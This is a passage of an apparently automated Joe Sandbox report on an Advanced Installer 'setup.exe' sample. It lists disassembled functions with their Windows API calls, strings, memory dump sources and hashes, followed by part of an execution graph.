                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                                                                              • String ID: << Advanced Installer (x86) Log >>
                                                                                                                                                                              • API String ID: 3699736680-396061572
                                                                                                                                                                              • Opcode ID: 0c927793b31663d8d52c8cddec986c06d2a7c6dc8e24600aea60d495fa571002
                                                                                                                                                                              • Instruction ID: b9117a990c5176b64992560f41a487dd0f47bd634e48dcdbdbe03240e5de4363
                                                                                                                                                                              • Opcode Fuzzy Hash: 0c927793b31663d8d52c8cddec986c06d2a7c6dc8e24600aea60d495fa571002
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B61D070905645DFD700CF69C94879ABBF4FF8A314F1882ADD510EB791DB74AA08CB91
                                                                                                                                                                              Function 00CBD230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(?,02141699), ref: 00CBD2D1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path
                                                                                                                                                                              • String ID: \\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 2875597873-3019864461
                                                                                                                                                                              • Opcode ID: 3ddaddfd6bcefbd48dc87b1a9bd3c3ecd0d7907e3409b8ff44c5cc9004fe5332
                                                                                                                                                                              • Instruction ID: 1a22a09711995a66ac0981e0da6cb98fe45323872d3c88fbbb9e7040376bfb41
                                                                                                                                                                              • Opcode Fuzzy Hash: 3ddaddfd6bcefbd48dc87b1a9bd3c3ecd0d7907e3409b8ff44c5cc9004fe5332
                                                                                                                                                                              • Instruction Fuzzy Hash: F451E370D046049BDB14DF68C885BEEB7F5FF95304F10861DE81267281EBB56949CBE1
                                                                                                                                                                              Function 00D22750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenEventW.KERNEL32(00000000,00000000,02141699,_pbl_evt,00000008,?,?,00E2FC80,00000001,02141699,00000000), ref: 00D227FE
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00D2281B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$CreateOpen
                                                                                                                                                                              • String ID: _pbl_evt
                                                                                                                                                                              • API String ID: 2335040897-4023232351
                                                                                                                                                                              • Opcode ID: f601bbc50cb19dbf255b4a8d60db63adc246c13baa9404dc40a368daa10d6e40
                                                                                                                                                                              • Instruction ID: d9b6527cb4b79d9f9d64e806d737694702ec274a464c669708175f597479b2f0
                                                                                                                                                                              • Opcode Fuzzy Hash: f601bbc50cb19dbf255b4a8d60db63adc246c13baa9404dc40a368daa10d6e40
                                                                                                                                                                              • Instruction Fuzzy Hash: A751A371D04618EFDB10DFA8DC86BAEB7B4FB14714F108269F915B7680DB746A04CBA1
                                                                                                                                                                              Function 00D05DC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147synchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,FTP Server,0000000A), ref: 00D05E44
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A,?,00000000,FTP Server,0000000A), ref: 00D05E7D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$ErrorHeapLastObjectProcessSingleWait
                                                                                                                                                                              • String ID: REST %u
                                                                                                                                                                              • API String ID: 1670056567-3183379045
                                                                                                                                                                              • Opcode ID: 46f00732bd7f28ee8fe66d5f1883bcc289ee05e33f3aca561395247764df5638
                                                                                                                                                                              • Instruction ID: 312dd9a4baecab9abcd42482de8d6e267b4e7b862c1aa6b653a2a2bee646fbeb
                                                                                                                                                                              • Opcode Fuzzy Hash: 46f00732bd7f28ee8fe66d5f1883bcc289ee05e33f3aca561395247764df5638
                                                                                                                                                                              • Instruction Fuzzy Hash: 9051E071500A059FD720CB69D884B2BB7E5FF01320F284669F89A9B6E1DB74ED44CF60
                                                                                                                                                                              Function 00D01060 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,02141699,?,?,00EA16AC), ref: 00D0109F
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00EA16AC), ref: 00D01100
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectoryPathTemp
                                                                                                                                                                              • String ID: ADVINST_LOGS
                                                                                                                                                                              • API String ID: 2885754953-2492584244
                                                                                                                                                                              • Opcode ID: 6dcb5081722615b64bc485bb29e1f9ac52c81f729e907ec64cd586bc8073adf2
                                                                                                                                                                              • Instruction ID: 115b95a1d0102383f87dd6f692a696c4d6b28e8c23290dbf4939a4ba1f7013ff
                                                                                                                                                                              • Opcode Fuzzy Hash: 6dcb5081722615b64bc485bb29e1f9ac52c81f729e907ec64cd586bc8073adf2
                                                                                                                                                                              • Instruction Fuzzy Hash: E951B179900219CACB249F68C8447BAB3F4FF14714F2846AEE959972D0EB354E81CBA1
                                                                                                                                                                              Function 00CD4380 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,02141699,00E2F008), ref: 00CD43EC
                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00CD44E3
                                                                                                                                                                                • Part of subcall function 00CC0520: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CC05F5
                                                                                                                                                                              Strings
                                                                                                                                                                              • Failed to get Windows error message [win32 error 0x, xrefs: 00CD440A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FormatFreeIos_base_dtorLocalMessagestd::ios_base::_
                                                                                                                                                                              • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                                                                                              • API String ID: 201254970-3373098694
                                                                                                                                                                              • Opcode ID: 8dadaca9a4e6085d56d1d6f70ad79aa33a08c148355f54572e7894b7ca2c1412
                                                                                                                                                                              • Instruction ID: de444d0102dec5a2ce1807bee4f177d99499d5019adcc85ace9e48e38ea11332
                                                                                                                                                                              • Opcode Fuzzy Hash: 8dadaca9a4e6085d56d1d6f70ad79aa33a08c148355f54572e7894b7ca2c1412
                                                                                                                                                                              • Instruction Fuzzy Hash: C941B470A003089FDB10DF68C946BAEBBF8EF44714F208269E515A7391DB749B48CBD1
                                                                                                                                                                              Function 00BE6C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BE6C6B
                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE6CCE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                              • API String ID: 3988782225-1405518554
                                                                                                                                                                              • Opcode ID: 616f5c536a6f5e01dfc452afe84783e0a56e2849a5973fd08672ff646b9ba1e4
                                                                                                                                                                              • Instruction ID: 91ba328942c7d2bb4d36e5cbbcc67cef9b7167dc4bfa562c36f1b7168e524b5e
                                                                                                                                                                              • Opcode Fuzzy Hash: 616f5c536a6f5e01dfc452afe84783e0a56e2849a5973fd08672ff646b9ba1e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 8621E070A05784DED720CF69C90478ABBF4EF15300F24869DE48997B81D7B5AA04C7A1
                                                                                                                                                                              Function 00BC922F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(0000000F), ref: 00BC9262
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00BC9247
                                                                                                                                                                              • Unknown exception, xrefs: 00BC9237
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Parent
                                                                                                                                                                              • String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                                                                                                                                              • API String ID: 975332729-9186675
                                                                                                                                                                              • Opcode ID: ebb1b6f5e52d3dea8d80fdf1842f6795807a3ed6a1e367108fb4ad90bf38b72f
                                                                                                                                                                              • Instruction ID: 9eae44e6e2a37dddb9cba641336749d64961ff2dd08f2a0385eb6b6cf0da5e36
                                                                                                                                                                              • Opcode Fuzzy Hash: ebb1b6f5e52d3dea8d80fdf1842f6795807a3ed6a1e367108fb4ad90bf38b72f
                                                                                                                                                                              • Instruction Fuzzy Hash: E7016D30D05298EFDB04EBE8C959ADDBBB0AF55304F1480D8E441BB296DBB45E48DB92
                                                                                                                                                                              Function 00BB47D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              • Unknown exception, xrefs: 00BB47DA
                                                                                                                                                                              • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BB47ED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ActiveWindow
                                                                                                                                                                              • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                                                                                              • API String ID: 2558294473-2631306498
                                                                                                                                                                              • Opcode ID: b7fc0863be200913dd74cedd66c26374c97ba8d24b328b02b0ae456168a22803
                                                                                                                                                                              • Instruction ID: a7b9486b89e4c7789e57a683d14490f1ce93270c4265fac6a6dc98e6dd73f053
                                                                                                                                                                              • Opcode Fuzzy Hash: b7fc0863be200913dd74cedd66c26374c97ba8d24b328b02b0ae456168a22803
                                                                                                                                                                              • Instruction Fuzzy Hash: 81018030D05298DFCF05EBE8C9556DEBBB0AF56300F148198D0417B387DBB45A08D792
                                                                                                                                                                              Function 00BB445E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              • Unknown exception, xrefs: 00BB4466
                                                                                                                                                                              • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BB4476
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ActiveWindow
                                                                                                                                                                              • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                                                                                              • API String ID: 2558294473-2631306498
                                                                                                                                                                              • Opcode ID: 621149507591b2c7c7576a163b2390167953717256eb5d61f21a4905f91afa88
                                                                                                                                                                              • Instruction ID: a797cc0d0d5bf18e0593120bb990845632daf7c050236127ffe7ac4df41c29df
                                                                                                                                                                              • Opcode Fuzzy Hash: 621149507591b2c7c7576a163b2390167953717256eb5d61f21a4905f91afa88
                                                                                                                                                                              • Instruction Fuzzy Hash: 18018C30D05298EFCB05DBE8C9556DDBBB0AF56304F148098E042BB386DBB45A08E792

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.1%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                              Total number of Nodes:254
                                                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                                                              execution_graph 32276 d23330 32279 d23365 32276->32279 32277 d23397 32306 d7fd94 15 API calls 3 library calls 32277->32306 32279->32277 32281 d2341c 32279->32281 32280 d2339e 32307 c7eab0 32280->32307 32285 d23457 32281->32285 32286 d234c8 32281->32286 32283 d233df 32284 d2354f 32291 d235da 32284->32291 32293 d23587 32284->32293 32313 d7fd94 15 API calls 3 library calls 32285->32313 32286->32284 32288 d234fc 32286->32288 32314 d7fd94 15 API calls 3 library calls 32288->32314 32290 d2345e 32297 d23617 32291->32297 32298 d23673 32291->32298 32292 d23503 32315 d7fd94 15 API calls 3 library calls 32293->32315 32294 d23700 32318 d7fd94 15 API calls 3 library calls 32294->32318 32316 d7fd94 15 API calls 3 library calls 32297->32316 32298->32294 32303 d236a4 32298->32303 32299 d2358e 32300 d23707 32302 d2361e 32317 d7fd94 15 API calls 3 library calls 32303->32317 32305 d236ab 32306->32280 32308 c7eae4 32307->32308 32312 c7eb01 std::ios_base::_Ios_base_dtor 32307->32312 32319 d7fd94 15 API calls 3 library calls 32308->32319 32310 c7eaeb 32320 d16e40 32310->32320 32312->32283 32313->32290 32314->32292 32315->32299 32316->32302 32317->32305 32318->32300 32319->32310 32323 cd0dc0 32320->32323 32330 cd1040 32323->32330 32327 cd0ea5 32327->32312 32328 cd0e10 std::locale::_Setgloballocale 32328->32327 32342 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32328->32342 32331 cd1077 32330->32331 32337 cd0de9 32330->32337 32332 d80260 4 API calls 32331->32332 32333 cd1081 32332->32333 32333->32337 32343 cd10e0 32333->32343 32337->32327 32338 d80260 EnterCriticalSection 32337->32338 32339 d80274 32338->32339 32340 d80279 32339->32340 32382 d802e8 SleepConditionVariableCS WaitForSingleObjectEx EnterCriticalSection 32339->32382 32340->32328 32342->32327 32344 cd1136 RegOpenKeyExW 32343->32344 32345 cd115c RegQueryValueExW RegQueryValueExW 32344->32345 32346 cd141b 32344->32346 32349 cd11bf RegQueryValueExW 32345->32349 32350 cd121b RegQueryValueExW 32345->32350 32347 cd1447 32346->32347 32348 cd1436 RegCloseKey 32346->32348 32380 d7fd55 5 API calls ___raise_securityfailure 32347->32380 32348->32347 32349->32350 32351 cd11f3 32349->32351 32353 cd125e 32350->32353 32351->32350 32351->32351 32355 cd12ab RegQueryValueExW 32353->32355 32354 cd10aa 32368 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32354->32368 32356 cd12fd RegQueryValueExW 32355->32356 32357 cd12d8 32355->32357 32358 cd132a 32356->32358 32357->32356 32359 cd13db 32358->32359 32360 d80260 4 API calls 32358->32360 32361 cd13ff 32359->32361 32362 cd13e5 GetCurrentProcess 32359->32362 32363 cd139e 32360->32363 32369 cd1470 32361->32369 32362->32361 32363->32359 32365 cd13aa GetModuleHandleW GetProcAddress 32363->32365 32379 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32365->32379 32367 cd13d8 32367->32359 32368->32337 32370 cd14c8 RegOpenKeyExW 32369->32370 32371 cd14ee RegQueryValueExW 32370->32371 32378 cd15a0 32370->32378 32372 cd156f RegQueryValueExW 32371->32372 32373 cd1521 32371->32373 32372->32378 32373->32372 32374 cd176d RegCloseKey 32375 cd177e 32374->32375 32381 d7fd55 5 API calls ___raise_securityfailure 32375->32381 32377 cd1796 32377->32346 32378->32374 32378->32375 32379->32367 32380->32354 32381->32377 32382->32339 32383 bb180e 32384 d80260 4 API calls 32383->32384 32385 bb1818 32384->32385 32386 bb1846 32385->32386 32437 d80118 43 API calls 32385->32437 32415 bb1a2a std::ios_base::_Ios_base_dtor 32386->32415 32421 cc72e0 32386->32421 32390 bb1835 32438 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32390->32438 32391 bb1a93 32448 d7fd55 5 API calls ___raise_securityfailure 32391->32448 32395 bb1abd 32396 bb18ba 32398 bb18d5 GetWindowsDirectoryW 32396->32398 32401 bb18c3 32396->32401 32397 d80260 4 API calls 32400 bb187a 32397->32400 32440 d89bfb 40 API calls 2 library calls 32398->32440 32400->32396 32402 bb1886 GetModuleHandleW GetProcAddress 32400->32402 32405 bb1917 32401->32405 32406 bb19bf 32401->32406 32439 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32402->32439 32404 bb18b7 32404->32396 32441 cc76d0 13 API calls 32405->32441 32406->32415 32445 ba8300 42 API calls 2 library calls 32406->32445 32409 bb1940 32442 cc76d0 13 API calls 32409->32442 32410 bb1a12 32446 cbd440 42 API calls __startOneArgErrorHandling 32410->32446 32413 bb1957 32443 cc7c40 LocalFree LocalFree GetLastError 32413->32443 32447 ba7830 42 API calls 2 library calls 32415->32447 32416 bb1962 32417 bb199a 32416->32417 32418 bb1966 CreateDirectoryW 32416->32418 32444 cc7580 18 API calls ___std_exception_destroy 32417->32444 32418->32417 32420 bb19a9 32420->32406 32422 cc7328 GetCurrentProcess OpenProcessToken 32421->32422 32423 cc734c GetTokenInformation 32422->32423 32424 cc733f GetLastError 32422->32424 32426 cc736f GetLastError 32423->32426 32427 cc739b 32423->32427 32425 cc73f4 32424->32425 32431 cc742d 32425->32431 32432 cc741f CloseHandle 32425->32432 32428 cc73ee GetLastError 32426->32428 32429 cc737a 32426->32429 32427->32428 32430 cc73a1 AllocateAndInitializeSid 32427->32430 32428->32425 32435 cc7385 GetTokenInformation 32429->32435 32430->32425 32433 cc73d2 EqualSid FreeSid 32430->32433 32449 d7fd55 5 API calls ___raise_securityfailure 32431->32449 32432->32431 32433->32425 32435->32427 32435->32428 32436 bb185b 32436->32396 32436->32397 32437->32390 32438->32386 32439->32404 32440->32401 32441->32409 32442->32413 32443->32416 32444->32420 32445->32410 32446->32415 32447->32391 32448->32395 32449->32436 32450 ca9f40 32457 caa450 32450->32457 32453 caa450 65 API calls 32454 ca9fa0 32453->32454 32473 bb83a0 26 API calls 32454->32473 32456 ca9fc6 32458 caa47f 32457->32458 32459 ca9f4f 32457->32459 32460 caa4e5 32458->32460 32461 d80260 4 API calls 32458->32461 32459->32453 32460->32459 32462 d80260 4 API calls 32460->32462 32463 caa49e 32461->32463 32464 caa4ff 32462->32464 32463->32460 32474 c889f0 GetSystemDirectoryW 32463->32474 32464->32459 32465 caa50b GetProcAddress 32464->32465 32501 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32465->32501 32467 caa4bb 32499 d80118 43 API calls 32467->32499 32470 caa539 32470->32459 32471 caa4d4 32500 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32471->32500 32473->32456 32475 c88a3f 32474->32475 32497 c88afb 32474->32497 32475->32497 32502 baacf0 32475->32502 32478 c88b4b 32478->32467 32480 c88a59 32484 c88a83 32480->32484 32485 c88a75 32480->32485 32481 c88b53 32531 baa9b0 32481->32531 32483 c88b5d 32535 d7fd94 15 API calls 3 library calls 32483->32535 32529 baa830 42 API calls 4 library calls 32484->32529 32528 baa2a0 49 API calls 32485->32528 32488 c88cb2 32536 bbf0f0 42 